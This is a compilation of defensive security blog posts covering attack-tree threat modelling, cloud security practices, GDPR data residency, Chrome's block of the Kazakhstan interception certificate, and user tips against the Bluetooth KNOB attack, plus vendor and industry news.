Bruce Schneier (Schneier on Security) provides an analytical tool for systematically reviewing why and how an attack might occur. After defining which assets are most valuable to an attacker (motive), you can identify the attacker’s objective, referred to as the root node in an attack tree. From there, you can map out all the possible actions an attacker might take to compromise the primary assets (method). The most probable and least time-consuming of these reveals the most likely attack path (opportunity).

I like using divergent and convergent thinking described by Chris Grivas and Gerard Puccio to discover plausible motive, opportunity, and methods used by a potential threat actor. Divergent thinking is the generation of ideas, using techniques like brainstorming. Convergent thinking is the limiting of ideas based on certain criteria. Using this process, you and your security team can generate objectives and then decide which objectives pose the greatest threat. You can then use this process again to determine the possible methods, referred to as leaf nodes, that could be used to access the objective. Then, you can apply values, such as time, to visualize possible opportunities and attack paths.

To further your understanding of how to create an attack tree, let’s look at an example:

1.  First, decide what primary assets your company has that an intruder is interested in accessing.

The 2019 DBIR provides some useful categories to determine attack patterns within specific industries.  For this example, let’s look at a financial institution. One likely asset that a threat actor is attempting to access is the email server, so this is our root node, or objective. Again, using divergent and convergent thinking can help a team develop and clarify possible objectives.

2.  After deciding on the objective, the second step in developing an attack tree is to define methods to access the objective.

The 2019 DBIR describes some likely methods threat actors might use, or you can use divergent and convergent thinking. In the example below, I’ve included some possible methods to access the email server.

Attack Tree Visualization

3.  As you analyze the threat, continue working through the tree and building out the methods to develop specific paths to the asset.

The diagram below shows some potential paths to access and harvest information from the email server, using OR nodes, which are alternative paths, and AND nodes, which require combined activities to achieve the objective. Note that every method that isn’t an AND node is an OR node.

Attack Tree Visualization

4.  The fourth step is to apply binary values to decide what paths the attack is most likely to follow.

For example, I’m going to use likely (l) and unlikely (u) based on the methods my research has shown are available to the attacking team. Then, use a dotted line to show all likely paths, which are those in which every method along the path is assigned a likely value.

Attack Tree Visualization

5.  The fifth step is to apply numeric values to the sub-nodes to decide on what path, specifically, the threat actor might attempt.

I’m going to use minutes in this scenario; however, other values such as associated costs or probability of success could also be used. These are subjective values and will vary amongst teams. Paths with supporting data would provide a more accurate model, but Attack Trees are still useful even without objective data.

Attack Tree Visualization

In the above example, I have determined the path with the shortest amount of time to be phishing (credential harvesting), assuming the credentials are the same for the user accounts as they are for admin accounts. Since I have already determined that this path is likely and I now know it takes the shortest amount of time, I can determine that this is the most at-risk and likely path to accessing the email server.  In this example, the least likely path is stolen credentials.
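The AND/OR logic in steps 3 through 5 can be sketched in a few lines of code. This is a toy model for illustration only: the node names and minute values below are hypothetical stand-ins for the subjective estimates your team would assign, not figures from the DBIR or the diagrams above.

```python
# Toy attack tree evaluator. OR nodes take the cheapest branch; AND nodes
# require every branch, so their cost is the sum of the branch costs.
# All names and minute values are illustrative assumptions.

def cost(node):
    if "time" in node:  # leaf: estimated minutes for this method
        return node["time"]
    branch_costs = [cost(child) for child in node["children"]]
    return min(branch_costs) if node["op"] == "OR" else sum(branch_costs)

# Root objective (root node from step 1): access the email server.
tree = {
    "op": "OR",
    "children": [
        {"name": "phishing (credential harvesting)", "time": 30},
        {"op": "AND", "children": [            # both steps are required
            {"name": "gain physical access", "time": 120},
            {"name": "install keylogger", "time": 60},
        ]},
        {"name": "stolen credentials", "time": 2880},
    ],
}

print(cost(tree))  # -> 30: phishing is the shortest, most at-risk path
```

Swapping min for sum at AND nodes is the whole trick; richer models substitute associated cost or probability of success for minutes, as noted in step 5.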

6.  After examining the possible motives, opportunities, and methods, you can decide how you want to protect your assets.

For example, I determined that phishing is likely with the attack tree above, so I might decide to outsource monitoring, detection, and training to a Managed Security Service Provider (MSSP) that can provide this at a lower cost than an in-house staff. I might also consider purchasing software to detect, report, and prevent phishing emails, limiting the possibility of a phishing attempt. If social engineering is determined to be a concern, you could conduct end-user training, look for ways to secure the physical environment (guards, better door locks), or make the work environment more desirable (cafeteria, exercise room, recreation area, etc.).

The models discussed work together to provide ways to determine, analyze, and proactively protect against the greatest threats to your valuable assets. Ultimately, thinking through scenarios using these tools will provide a more thoughtful and cost-effective approach to security.

The post Define Your Unique Security Threats with These Tools appeared first on GRA Quantum.

19 Cloud Security Best Practices for 2019

Now well into its second decade of commercial availability, cloud computing has become near-ubiquitous, with roughly 95 percent of businesses reporting that they have a cloud strategy. While cloud providers are more secure than ever before, there are still risks to using any cloud service. Fortunately, they can be largely mitigated by following these cloud security best practices:

Protect Your Cloud Data

  1. Determine which data is the most sensitive. While applying the highest level of protection across the board would naturally be overkill, failing to protect the data that is sensitive puts your enterprise at risk of intellectual property loss or regulatory penalties. Therefore, the first priority should be to gain an understanding of what to protect through data discovery and classification, which is typically performed by a data classification engine. Aim for a comprehensive solution that locates and protects sensitive content on your network, endpoints, databases and in the cloud, while giving you the appropriate level of flexibility for your organization.
  2. How is this data being accessed and stored? While it’s true that sensitive data can be stored safely in the cloud, it certainly isn’t a foregone conclusion. According to the McAfee 2019 Cloud Adoption and Risk Report, 21 percent of all files in the cloud contain sensitive data—a sharp increase from the year before1. While much of this data lives in well-established enterprise cloud services such as Box, Salesforce and Office365, it’s important to realize that none of these services guarantees 100 percent safety. That’s why it’s important to examine the permissions and access context associated with data in your cloud environment and adjust appropriately. In some cases, you may need to remove or quarantine sensitive data already stored in the cloud.
  3. Who should be able to share it, and how? Sharing of sensitive data in the cloud has increased by more than 50% year over year.1 Regardless of how powerful your threat mitigation strategy is, the risks are far too high to take a reactive approach: access control policies should be established and enforced before data ever enters the cloud. Just as the number of employees who need the ability to edit a document is much smaller than the number who may need to view it, it is very likely that not everyone who needs to be able to access certain data needs the ability to share it. Defining groups and setting up privileges so that sharing is only enabled for those who require it can drastically limit the amount of data being shared externally.
  4. Don’t rely on cloud service encryption. Comprehensive encryption at the file level should be the basis of all your cloud security efforts. While the encryption offered within cloud services can safeguard your data from outside parties, it necessarily gives the cloud service provider access to your encryption keys. To fully control access, you’ll want to deploy stringent encryption solutions, using your own keys, before uploading data to the cloud.

Minimize Internal Cloud Security Threats  

  1. Bring employee cloud usage out of the shadows. Just because you have a corporate cloud security strategy in place doesn’t mean that your employees aren’t utilizing the cloud on their own terms. From cloud storage accounts like Dropbox to online file conversion services, most people don’t consult with IT before accessing the cloud. To measure the potential risk of employee cloud use, you should first check your web proxy, firewall and SIEM logs to get a complete picture of which cloud services are being utilized, and then conduct an assessment of their value to the employee/organization versus their risk when deployed wholly or partially in the cloud. Also, keep in mind that shadow usage doesn’t just refer to known endpoints accessing unknown or unauthorized services—you’ll also need a strategy to stop data from moving from trusted cloud services to unmanaged devices you’re unaware of. Because cloud services can provide access from any device connected to the internet, unmanaged endpoints such as personal mobile devices create a hole in your security strategy. You can restrict downloads to unauthorized devices by making device security verification a prerequisite to downloading files.
  2. Create a “safe” list. While most of your employees are utilizing cloud services for above-the-board purposes, some of them will inadvertently find and use dubious cloud services. Of the 1,935 cloud services in use at the average organization, 173 of them rank as high-risk services.1 By knowing which services are being used at your company, you’ll be able to set policies 1.) Outlining what sorts of data are allowed in the cloud, 2.) Establishing a “safe” list of cloud applications that employees can utilize, and 3.) Explaining the cloud security best practices, precautions and tools required for secure utilization of these applications.
  3. Endpoints play a role, too. Most users access the cloud through web browsers, so deploying strong client security tools and ensuring that browsers are up-to-date and protected from browser exploits is a crucial component of cloud security. To fully protect your end-user devices, utilize advanced endpoint security such as firewall solutions, particularly if using IaaS or PaaS models.
  4. Look to the future. New cloud applications come online frequently, and the risk of cloud services evolves rapidly, making manual cloud security policies difficult to create and keep up to date. While you can’t predict every cloud service that will be accessed, you can automatically update web access policies with information about the risk profile of a cloud service in order to block access or present a warning message. Accomplish this through integration of closed-loop remediation (which enforces policies based on a service-wide risk rating or distinct cloud service attributes) with your secure web gateway or firewall. The system will automatically update and enforce policies without disrupting the existing environment.
  5. Guard against careless and malicious users. With organizations experiencing an average of 14.8 insider threat incidents per month—and 94.3 percent experiencing an average of at least one a month—it isn’t a matter of if you will encounter this sort of threat; it’s a matter of when. Threats of this nature include both unintentional exposure—such as accidentally disseminating a document containing sensitive data—as well as true malicious behavior, such as a salesperson downloading their full contact list before leaving to join a competitor. Careless employees and third-party attackers can both exhibit behavior suggesting malicious use of cloud data. Solutions leveraging both machine learning and behavioral analytics can monitor for anomalies and mitigate both internal and external data loss.
  6. Trust. But verify. Additional verification should be required for anyone using a new device to access sensitive data in the cloud. One suggestion is to automatically require two-factor authentication for any high-risk cloud access scenarios. Specialized cloud security solutions can introduce the requirement for users to authenticate with an additional identity factor in real time, leveraging existing identity providers and identity factors (such as a hard token, a mobile phone soft token, or text message) already familiar to end users.
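As a minimal sketch of the “safe” list idea above, the check below flags cloud services seen in access logs that aren’t on an approved list. The service names and log shape are made up for illustration; a real deployment would draw both from your proxy, firewall, or SIEM logs and from a maintained registry of sanctioned applications.

```python
# Toy "safe list" enforcement: flag any cloud service host seen in an
# access log that is not on the approved list. Hosts are hypothetical.

SAFE_LIST = {"box.com", "salesforce.com", "office365.com"}

def flag_unapproved(access_log):
    """Return the unapproved hosts, deduplicated and sorted."""
    return sorted({host for host in access_log if host not in SAFE_LIST})

log = ["box.com", "file-convert.example", "salesforce.com", "pastebin.com"]
print(flag_unapproved(log))  # -> ['file-convert.example', 'pastebin.com']
```

In practice, each flagged service would then be assessed for its value to the employee or organization versus its risk, and either added to the safe list or blocked at the gateway.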

Develop Strong Partnerships with Reputable Cloud Providers

  1. Regulatory compliance is still key. Regardless of how many essential business functions are shifted to the cloud, an enterprise can never outsource responsibility for compliance. Whether you’re required to comply with the California Consumer Privacy Act, PCI DSS, GDPR, HIPAA or other regulatory policies, you’ll want to choose a cloud architecture platform that will allow you to meet any regulatory standards that apply to your industry. From there, you’ll need to understand which aspects of compliance your provider will take care of, and which will remain under your purview. While many cloud service providers are certified for myriad industry and governmental regulations, it’s still your responsibility to build compliant applications and services on the cloud, and to maintain that compliance going forward. It’s important to note that previous contractual obligations or legal barriers may prohibit the use of cloud services on the grounds that doing so constitutes relinquishing control of that data.
  2. But brand compliance is important, too. Moving to the cloud doesn’t have to mean sacrificing your branding strategy. Develop a comprehensive plan to manage identities and authorizations with cloud services. Software services that comply with SAML, OpenID or other federation standards make it possible for you to extend your corporate identity management tools into the cloud.
  3. Look for trustworthy providers. Cloud service providers committed to accountability, transparency and meeting established standards will generally display certifications such as SAS 70 Type II or ISO 27001. Cloud service providers should make readily accessible documentation and reports, such as audit results and certifications, complete with details relevant to the assessment process. Audits should be independently conducted and based on existing standards. It is the responsibility of the cloud provider to continuously maintain certifications and to notify clients of any changes in status, but it’s the customer’s responsibility to understand the scope of standards used—some widely used standards do not assess security controls, and some auditing firms and auditors are more reliable than others.
  4. How are they protecting you? No cloud service provider offers 100 percent security. Over the past several years, many high profile CSPs have been targeted by hackers, including AWS, Azure, Google Drive, Apple iCloud, Dropbox, and others. It’s important to examine the provider’s data protection strategies and multitenant architecture, if relevant—if the provider’s own hardware or operating system are compromised, everything hosted within them is automatically at risk. For that reason, it’s important to use security tools and examine prior audits to find potential security gaps (and if the provider uses their own third-party providers, cloud security best practices suggest you examine their certifications and audits as well.) From there, you’ll be able to determine what security issues must be addressed on your end. For example, fewer than 1 in 10 providers encrypt data stored at rest, and even fewer support the ability for a customer to encrypt data using their own encryption keys.1 Finding providers that both offer comprehensive protection as well as the ability for users to bridge any gaps is crucial to maintaining a strong cloud security posture.
  5. Investigate cloud provider contracts and SLAs carefully. The cloud services contract is your only guarantee of service, and your primary recourse should something go wrong—so it is essential to fully review and understand all terms and conditions of your agreement, including any annexes, schedules and appendices. For example, a contract can make the difference between a company who takes responsibility for your data, and a company that takes ownership of your data. (Only 37.3 % of providers specify that customer data is owned by the customer. The rest either don’t legally specify who owns the data, creating a legal grey area—or, more egregiously, claim ownership of all uploaded data.1) Does the service offer visibility into security events and responses? Is it willing to provide monitoring tools or hooks into your corporate monitoring tools? Does it provide monthly reports on security events and responses? And what happens to your data if you terminate the service? (Keep in mind that only 13.3 percent of cloud providers delete user data immediately upon account termination. The rest keep data for up to a year, with some specifying they have a right to keep it indefinitely.) If you find parts of the contract objectionable, you can try to negotiate—but in the case where you’re told that certain terms are non-negotiable, it is up to you to determine whether the risk presented by accepting the terms as-is is an acceptable one to your business. If not, you’ll need to find alternate means of managing the risk, such as encryption or monitoring, or find another provider.
  6. What happens if something goes wrong? Since no two cloud service providers offer the same set of security controls—and again, no cloud provider delivers 100 percent security—developing an Incident Response (IR) plan is critical. Make sure the provider includes you and considers you a partner in creating such plans. Establish communication paths, roles and responsibilities with regard to an incident, and to run through the response and hand-offs ahead of time. SLAs should spell out the details of the data the cloud provider will provide in the case of an incident, how data will be handled during incidents to maintain availability, and guarantee the support necessary to effectively execute the enterprise IR plan at each stage. While continuous monitoring will offer the best chance at early detection, full-scale testing should be performed on at least an annual basis, with additional testing coinciding with major changes to the architecture.
  7. Protect your IaaS environments. When using IaaS environments such as AWS or Azure, you retain responsibility for the security of operating systems, applications, and network traffic. Advanced anti-malware technology should be applied to the OS and virtual network to protect your infrastructure. Deploy application whitelisting and memory exploit prevention for single-purpose workloads and machine learning-based protection for file stores and general-purpose workloads.
  8. Neutralize and remove malware from the cloud. Malware can infect cloud workloads through shared folders that sync automatically with cloud storage services, spreading malware from an infected user device to another user’s device. Use a cloud security solution program to scan the files you’ve stored in the cloud to avoid malware, ransomware or data theft attacks. If malware is detected on a workload host or in a cloud application, it can be quarantined or removed, safeguarding sensitive data from compromise and preventing corruption of data by ransomware.
  9. Audit your IaaS configurations regularly.  The many critical settings in IaaS environments such as AWS or Azure can create exploitable weaknesses if misconfigured. Organizations have, on average, at least 14 misconfigured IaaS instances running at any given time, resulting in an average of nearly 2,300 misconfiguration incidents per month. Worse, greater than 1 in 20 AWS S3 buckets in use are misconfigured to be publicly readable.1 To avoid such potential for data loss, you’ll need to audit your configurations for identity and access management, network configuration, and encryption. McAfee offers a free Cloud Audit to help get you started.
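One concrete slice of such an audit is the publicly readable S3 bucket check mentioned above. The sketch below assumes ACLs shaped like the response from AWS’s GetBucketAcl API; the bucket names and grants are fabricated for illustration.

```python
# Toy misconfiguration check for publicly readable S3-style buckets.
# The ACL dicts mirror the shape of AWS's GetBucketAcl response; the
# bucket names and grants here are fabricated for illustration.

PUBLIC_GROUP = "http://acs.amazonaws.com/groups/global/AllUsers"

def publicly_readable(acl):
    """True if any grant gives the AllUsers group read (or full) access."""
    return any(
        grant.get("Grantee", {}).get("URI") == PUBLIC_GROUP
        and grant.get("Permission") in ("READ", "FULL_CONTROL")
        for grant in acl.get("Grants", [])
    )

acls = {
    "reports-bucket": {
        "Grants": [{"Grantee": {"Type": "Group", "URI": PUBLIC_GROUP},
                    "Permission": "READ"}],
    },
    "internal-bucket": {
        "Grants": [{"Grantee": {"Type": "CanonicalUser", "ID": "abc123"},
                    "Permission": "FULL_CONTROL"}],
    },
}

flagged = [name for name, acl in acls.items() if publicly_readable(acl)]
print(flagged)  # -> ['reports-bucket']
```

A real audit would fetch each ACL (for example, with boto3’s get_bucket_acl) and also review bucket policies and account-level public access settings, which this toy check ignores.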

 

  1. McAfee 2019 Cloud Adoption and Risk Report

 


Veracode Now Available on the Digital Marketplace G-Cloud UK


There is a deepening awareness that cyberthreats can never be eliminated completely, and digital resilience is an absolute necessity – and this is true for both private and public sector organizations and agencies. With this understanding, the UK Government created its G-Cloud Framework, which has transformed the way that public sector organizations can purchase information and communications technology in order to better build secure digital foundations. The program allows public bodies to buy commodity-based, pay-as-you-go cloud services through government-approved, short-term contracts via the Digital Marketplace. This procurement process supports the UK Government's Cloud First policy, as well as its desire to achieve a “Cloud Native” digital architecture.

Strengthening the security posture of your applications is critical in strengthening the security posture of your organization, and the Veracode Platform was created as a cloud-based application security solution because of the multitude of advantages it offers our customers. Not only are you able to avoid the expenses associated with purchasing hardware, procuring software, managing deployment and maintaining systems, you are also able to implement immediately, which means seeing results and value on day one. We’ve now made it even simpler for organizations within the UK to manage their application security portfolio: The Veracode Platform and services are now available for purchase on the Gov.uk Digital Marketplace.

Revolution not Evolution: How the UK Government Created a Cloud First Initiative

In 2010, the UK Government began a revolution that has influenced the way nations around the world conduct business and structure cybersecurity programs within their own government bodies and organizations. The creation of the Government Digital Service (GDS), a consumer-facing portal and link for businesses that simplifies interacting with the government, led the way to the adoption of a Cloud First policy for all government technology purchases.

The GDS team was created to fundamentally rethink how government works in the modern era, with the aim of establishing a digital center for the UK government that would bring talent in-house, rather than relying on vendor expertise to make changes to government web applications and properties. The ultimate goal was to fix and enhance the way that people interact with the government, to embed skills and capability across the government so that it could work in a new way, and to open up data and APIs so that others could build on government-developed services.

The re-architecting of the government website began with a whiteboard and a heavy focus on user needs. The small team worked together to build a hub that would evoke a response, understanding that leading with imagery was powerful, and iterated, changed, and improved as they homed in on users’ needs. At that time, no other government technology project had been run in an agile fashion.

The GDS team then took it one step further by making all of its GitHub repositories open: they considered it to be the people’s code, they wanted the public to help make that code better, and they knew it would make recruitment simpler if they could show potential candidates what was under the hood. It also allowed different agencies within the government to work together more openly, which helped reduce the risks associated with the open source code everyone was using.

The Cloud First Policy

This new approach to development also called for new processes and policies for acquiring software and working with technology vendors. In 2013, the UK government adopted a Cloud First policy for all technology decisions. By operating in a Cloud Native framework, the government is able to adapt how it organizes its work to take advantage of what’s available in the market and any emerging technologies. The new policy made it mandatory to consider cloud solutions before alternatives, and to demonstrate that a non-cloud technology would provide better value for money before opting for an on-premise solution.

Further, the policy states that the government must consider public cloud first – SaaS models, particularly for enterprise IT and back-office functions, as well as Infrastructure as a Service and Platform as a Service. The GDS team understands that without adapting and adopting technologies and focusing on core outcomes and principles, it won’t be able to meet the expectations of its users, and it won’t be prepared for the changes likely to arise as it manages growing volumes of data and a proliferation of devices and sensors.

To truly become cloud native, the GDS transformed how it monitors and manages distributed systems to include diverse applications. It continues to deepen the conversations with vendors about the standards that will help them manage these types of technology shifts. Most of all, it continues to ensure it always chooses cloud providers that fit the needs at hand, rather than basing choices on recommendations.

To learn more about Veracode’s offerings on the Digital Marketplace G-Cloud UK, including our application security platform and services, click here.

IDG Contributor Network: Lack of cybersecurity is the biggest economic threat to the world over the next decade, CEOs say

In its 2019 CEO Imperative Study, Ernst & Young surveyed 200 global CEOs from the Forbes Global 2000 and Forbes Largest Private Companies across the Americas, Europe, the Middle East, Africa, and the Asia-Pacific region. Also interviewed were 100 senior investors from global firms that manage at least $100 billion in assets.

Regardless of their location, CEOs, board directors and institutional investors cited national and corporate gaps in cybersecurity as the biggest threat to business growth and the global economy. Income inequality and job losses stemming from technological change came second and third on the list of threats, while ethics in artificial intelligence and climate change rounded out the top five.

To read this article in full, please click here

Data Residency: A Concept Not Found In The GDPR

Are you facing customers telling you that their data must be stored in a particular location?

Be reassured: As a processor of data, we often encounter discussions about where data must reside, and we often face people who are certain that their data must be stored in a given country. But the truth is, most people misunderstand the actual legal requirement.

To understand the obligations and requirements surrounding data storage, you first need to understand the difference in concepts between “data residency” and “data localization.”

What Are Data Residency and Data Localization?

Data residency is when an organization specifies that their data must be stored in a geographical location of their choice, usually for regulatory, tax or policy reasons. By contrast, data localization is when a law requires that data created within a certain territory stays within that territory.

People arguing that data must be stored in a certain location are usually pursuing at least one of the following three objectives:

  1. To allow data protection authorities to exert more control over data retention and thereby have greater control over compliance.
  2. In the EU, it is seen as means to encourage data controllers to store and process data within the EU or within those countries deemed to have the same level of data protection as in the EU, as opposed to moving data to those territories considered to have less than “adequate” data protection regimes. The EU has issued only 13 adequacy decisions: for Andorra, Argentina, Canada (commercial organizations), Faroe Islands, Guernsey, Israel, Isle of Man, Japan, Jersey, New Zealand, Switzerland, US (Privacy Shield only) and Uruguay.
  3. Finally, it is seen by some as a tool to strengthen the market position of local data center providers by forcing data to be stored in-country.

However, it is important to note that accessing personal data is considered a “transfer” under data protection law—so even if data is stored in Germany (for example), if a company has engineers in India access the data for customer service or support purposes, it has now “moved” out of Germany. Therefore, you can’t claim “residency” in Germany if there is access by a support function outside the country. Additionally, payment processing functions also sometimes occur in other countries, so make sure to consider them as well. This is an important point that is often missed or misunderstood.

Having understood the concept of data residency and data localization, the next question is, are there data residency or localization requirements under GDPR?

In short: No. GDPR does not introduce and does not include any data residency or localization obligations. There were also no data residency or localization obligations under the GDPR’s predecessor, the Data Protection Directive (95/46/EC). In fact, both the Directive and the GDPR establish methods for transferring data outside the EU.

Having said that, it is important to note that local law may impose certain requirements on the location of the data storage (e.g., Russia’s data localization law, German localization law for health and telecom data, etc.).

So, if there is no data residency or localization requirement under GDPR, can we transfer the data to other locations?

The GDPR substantially repeats the requirements of the Data Protection Directive: you need a legal transfer mechanism if you move data outside of the EU into a jurisdiction without adequate safeguards (see map here). The legal transfer mechanisms are:

  • Adequacy — a decision by the EU Commission that a country provides an adequate level of protection;
  • Binding Corporate Rules — binding internal rules of a corporate group, approved by data protection authorities;
  • Standard Contractual Clauses / Model Clauses — standardized contract templates issued by the EU Commission and entered into between the data exporter and the data importer;
  • Privacy Shield — for US companies only; a self-certification program that replaced Safe Harbor.

I have heard that Privacy Shield and the Standard Contractual Clauses are under serious scrutiny. What is this all about?

Following the European Court of Justice decision that the EU-US Safe Harbor arrangement does not provide adequate protection for the personal data of EU data subjects, the EU and US entered into a new arrangement to enable the transfer of data (the Privacy Shield). However, a number of non-governmental organizations and privacy advocates have started legal action to seek decisions that the Privacy Shield and the EU Standard Contractual Clauses do not provide sufficient protection of data subjects’ personal data.

It remains to be seen how the European Court of Justice will decide these cases; a ruling is expected by the end of 2019.

I have heard that the Standard Contractual Clauses/Model Clauses might be updated. What is that all about?

In order to protect data being transferred outside of the European Union, the European Commission issued three Standard Contractual Clause templates (two for controller-to-controller transfers and one for controller-to-processor transfers). These have not been updated since they were first introduced in 2001, 2004 and 2010, respectively. However, the European Union’s consumer commissioner, under whom privacy falls, has indicated that the EU is working on an updated version of the Standard Contractual Clauses. It remains to be seen how the Clauses will be modernized and whether the shortcomings of the existing Standard Contractual Clauses will be addressed to the satisfaction of all parties.

One thing is for certain, however—the data protection space will only get more attention from here on out, and those of us working in this space will have to become more accustomed to complexities such as those surrounding Data Residency.

 

This blog is for information purposes only and does not constitute legal advice, contractual commitment or advice on how to meet the requirements of any applicable law or achieve operational privacy and security. It is provided “AS IS” without guarantee or warranty as to the accuracy or applicability of the information to any specific situation or circumstance. If you require legal advice on the requirements of applicable privacy laws, or any other law, or advice on the extent to which McAfee technologies can assist you to achieve compliance with privacy laws or any other law, you are advised to consult a suitably qualified legal professional. If you require advice on the nature of the technical and organizational measures that are required to deliver operational privacy and security in your organization, you should consult a suitably qualified privacy professional. No liability is accepted to any party for any harms or losses suffered in reliance on the contents of this publication.

 

The post Data Residency: A Concept Not Found In The GDPR appeared first on McAfee Blogs.

Protecting Chrome users in Kazakhstan



When making secure connections, Chrome trusts certificates that have been locally installed on a user's computer or mobile device. This allows users to run tools to inspect and debug connections during website development, or for corporate environments to intercept and monitor internal traffic. It is not appropriate for this mechanism to be used to intercept traffic on the public internet.

In response to recent actions by the Kazakhstan government, Chrome, along with other browsers, has taken steps to protect users from the interception or modification of TLS connections made to websites.

Chrome will be blocking the certificate the Kazakhstan government required users to install:

Common Name: Qaznet Trust Network
SHA-256 Fingerprint: 00:30:9C:73:6D:D6:61:DA:6F:1E:B2:41:73:AA:84:99:44:C1:68:A4:3A:15:BF:FD:19:2E:EC:FD:B6:F8:DB:D2
SHA-256 of Subject Public Key Info: B5:BA:8D:D7:F8:95:64:C2:88:9D:3D:64:53:C8:49:98:C7:78:24:91:9B:64:EA:08:35:AA:62:98:65:91:BE:50


The certificate has been added to CRLSet. No action is needed by users to be protected. In addition, the certificate has been added to a blocklist in the Chromium source code and thus should be included in other Chromium based browsers in due course.
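For reference, a certificate's SHA-256 fingerprint like the one listed above is simply the SHA-256 hash of the certificate's DER encoding, formatted as colon-separated hex bytes. A minimal sketch in Python (the input bytes below are a placeholder, not the actual Qaznet certificate; a real check would hash the DER bytes returned by, e.g., `ssl.SSLSocket.getpeercert(binary_form=True)`):

```python
import hashlib

def sha256_fingerprint(der_bytes: bytes) -> str:
    """Return the SHA-256 hash of DER-encoded bytes as colon-separated hex."""
    digest = hashlib.sha256(der_bytes).hexdigest().upper()
    return ":".join(digest[i:i + 2] for i in range(0, len(digest), 2))

# Placeholder input; in practice this would be the server-presented
# certificate's DER encoding, compared against the blocked fingerprint.
print(sha256_fingerprint(b"placeholder certificate bytes"))
```

Comparing the computed value against a published fingerprint is how users and tools can independently confirm which certificate is being presented.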

Boost Your Bluetooth Security: 3 Tips to Prevent KNOB Attacks

Many of us use Bluetooth technology for its convenience and sharing capabilities. Whether you’re using wireless headphones or quickly Airdropping photos to your friend, Bluetooth has a variety of benefits that users take advantage of every day. But like many other technologies, Bluetooth isn’t immune to cyberattacks. According to Ars Technica, researchers have recently discovered a weakness in the Bluetooth wireless standard that could allow attackers to intercept device keystrokes, contact lists, and other sensitive data sent from billions of devices.

The Key Negotiation of Bluetooth attack, or “KNOB” for short, exploits this weakness by forcing two or more devices to choose an encryption key just a single byte in length before establishing a Bluetooth connection, allowing attackers within radio range to quickly crack the key and access users’ data. From there, hackers can use the cracked key to decrypt data passed between devices, including keystrokes from messages, address books uploaded from a smartphone to a car dashboard, and photos.
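To see why a one-byte key offers essentially no protection, consider a toy sketch. Bluetooth actually uses the E0 stream cipher or AES-CCM, not the XOR cipher below; the only point illustrated is that a key space of 2^8 = 256 candidates can be searched instantly by an attacker who can guess any fragment of the plaintext:

```python
def xor_cipher(data: bytes, key: int) -> bytes:
    # Toy stand-in for a cipher keyed with a single byte (0-255).
    # NOT Bluetooth's real cipher; used only to illustrate key-space size.
    return bytes(b ^ key for b in data)

def brute_force(ciphertext: bytes, known_prefix: bytes) -> int:
    # With only 256 candidate keys, trying every one is instantaneous.
    for key in range(256):
        if xor_cipher(ciphertext, key).startswith(known_prefix):
            return key
    raise ValueError("no key matched")

ct = xor_cipher(b"GET /contacts", 0x7B)
# An attacker guessing that traffic starts with "GET " recovers the key at once.
assert brute_force(ct, b"GET ") == 0x7B
```

A properly negotiated 16-byte key would instead give 2^128 candidates, which is why forcing the entropy down to one byte breaks the connection's confidentiality.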

What makes KNOB so stealthy? For starters, the attack doesn’t require a hacker to have any previously shared secret material or to observe the pairing process of the targeted devices. Additionally, the exploit keeps itself hidden from Bluetooth apps and the operating systems they run on, making it very difficult to spot the attack.

While the Bluetooth Special Interest Group (the body that oversees the wireless standard) has not yet provided a fix, there are still several ways users can protect themselves from this threat. Follow these tips to help keep your Bluetooth-compatible devices secure:

  • Adjust your Bluetooth settings. To avoid this attack altogether, turn off Bluetooth in your device settings.
  • Beware of what you share. Make it a habit to not share sensitive, personal information over Bluetooth.
  • Turn on automatic updates. A handful of companies, including Microsoft, Apple, and Google, have released patches to mitigate this vulnerability. To ensure that you have the latest security patches for vulnerabilities such as this, turn on automatic updates in your device settings.

And, of course, to stay updated on all of the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post Boost Your Bluetooth Security: 3 Tips to Prevent KNOB Attacks appeared first on McAfee Blogs.

Chris Young and Ken McCray Recognized on CRN’s 2019 Top 100 Executives List

CRN, a brand of The Channel Company, recently recognized McAfee CEO Chris Young and Head of Channel Sales Operations for the Americas Ken McCray in its list of Top 100 Executives of 2019. This annual list honors technology executives who lead, influence, innovate and disrupt the IT channel.

Over the past year, Young led McAfee into the EDR space, directed the introduction of McAfee’s cloud and unified data protection offerings, and forged a partnership with Samsung to safeguard the Galaxy S10 mobile device. According to CRN, these accomplishments earned Young the number-three spot in CRN’s list of 25 Most Innovative Executives—a subset of the Top 100 list that recognizes executives “who are always two steps ahead of the competition.” Young is no stranger to the Top 100 Executives list: He also earned a place on last year’s list, when his post-spinout acquisitions led to him being named one of the Top 25 Disruptors of 2018.

Based on his work overseeing the launch of McAfee’s alternative route to market channel initiative, Ken McCray was also recognized as one of this year’s Top 100 Executives. The initiative, which has driven incremental bookings as Managed Security Partners and cloud service providers bring new customers on board, earned McCray a spot on the Top 25 IT Channel Sales Leaders of 2019. This has been an accolade-filled year for McCray: In February, he was named one of the 50 Most Influential Channel Chiefs for 2019, based on his division’s double-digit growth and the relationships he built with key cloud service providers.

The Top 100 Executives being recognized drive cultural transformation, revenue growth, and technological innovation across the IT channel. In doing so, they help solution providers and technology suppliers survive—and thrive—in today’s always-on, always-connected global marketplace.

“The IT channel is rapidly growing, and navigating this fast-paced market often challenges solution providers and technology suppliers alike,” said Bob Skelley, CEO of The Channel Company. “The technology executives on CRN’s 2019 Top 100 Executives list understand the IT channel’s potential. They provide strategic and visionary leadership and unparalleled guidance to keep the IT channel moving in the right direction—regardless of the challenges that come their way.”

We at McAfee are proud of the recognition Young and McCray have received, and look forward to seeing our company continue to thrive under their leadership.

The Top 100 Executives list is featured in the August 2019 issue of CRN Magazine and online at www.CRN.com/Top100.

The post Chris Young and Ken McCray Recognized on CRN’s 2019 Top 100 Executives List appeared first on McAfee Blogs.

The Cybersecurity Playbook: Why I Wrote a Cybersecurity Book

I ruined Easter Sunday 2017 for McAfee employees the world over. That was the day our company’s page on a prominent social media platform was defaced—less than two weeks after McAfee had spun out of Intel to create one of the world’s largest pure-play cybersecurity companies. The hack would have been embarrassing for any company; it was humiliating for a cybersecurity company. And, while I could point the finger of blame in any number of directions, the sobering reality is that the hack happened on my watch, since, as the CMO of McAfee, it was my team’s responsibility to do everything in our power to safeguard the image of our company on that social media platform. We had failed to do so.

Personal accountability is an uncomfortable thing. Defensive behavior comes much more naturally to many of us, including me. But, without accountability, change is hindered. And, when you find yourself in the crosshairs of a hacker, change—and change quickly—you must.

